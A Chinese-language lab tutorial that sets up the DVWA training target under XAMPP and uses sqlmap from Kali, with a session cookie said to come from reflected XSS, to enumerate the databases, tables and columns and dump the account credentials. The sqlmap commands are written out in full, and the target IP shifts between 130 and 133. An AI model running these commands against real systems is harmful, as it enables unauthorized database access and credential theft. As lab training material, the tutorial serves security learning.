sqlmap对dvwa靶场的账号密码进行破解

2023-05-22 15:19| 来源: 网络整理| 查看: 265

1.进行靶场搭建准备两台虚拟机靶机：win7 攻击机：kali linux win7IP 172.26.0.130kali linuxIP 172.26.0.129 虚拟机搭建好后,相互ping能ping同就行安装xampp

XAMPP Installers and Downloads for Apache FriendsXAMPP is an easy to install Apache distribution containing MariaDB, PHP and Perl.https://www.apachefriends.org/zh_cn/index.html

xampp内包含以下三种功能模块，xampp可用于快速开发搭建自己的php网站 PHP动态网页设计语言Apache网络服务器Mysql关系型数据库管理系统安装好后的页面

2.搭建dvwa靶场下载dvwa

https://github.com/digininja/DVWA

下载后解压将解压的dvwa文件放到xampp安装目录的htdocs文件夹里

完成后启动xampp,并启动xampp里的apache和mysql后面按钮start进行启动，当apache与mysql变成下图绿色后就行了

3.靶场搭建完成验证靶场是否搭建成功，用攻击机kali的浏览器访问172.26.0.130/dvwa（172.26.0.130为靶机ip地址，dvwa是解压后dvwa的文件名）

进入后输入账号:admin密码:password点击login即可登录，并进入靶场主界面，然后选择sql注入

4.对靶场账号密码进行破解打开 kali终端输入sqlmap(kali系统自带sqlmap工具无需下载) sqlmapsqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL和SQL注入漏洞，其广泛的功能和选项包括数据库指纹，枚举，数据库提权，访问目标文件系统，并在获取操作权限时执行任意命令。

通过反射型xss拿到cookie值（需要登陆所以需要cookie）

通过sqlmap得到当前服务器所有数据库

sqlmap -u "http://172.26.0.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' --dbs

--dbs显示所有数据库

通过sqlmap继续查看dvwa库的所有表（可得guestbook表与users表）

sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa --tables

-D选择数据库--tables查看所有表

据此我们可猜测一下账号密码会在哪个表里（首先盲猜是在users表里，查看字段是找到账号密码的手段之一，一般账号字段为user,密码字段为password）

sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa -T users --column

-T选择表--column查看表字段

根据返回的字段我们可以肯定该靶场账号密码都在users表里

我们继续对账号密码进行爆破

-C选择字段--dump获取字段中的数据

本次教程完毕

希望三连

【本文地址】

公司简介

联系我们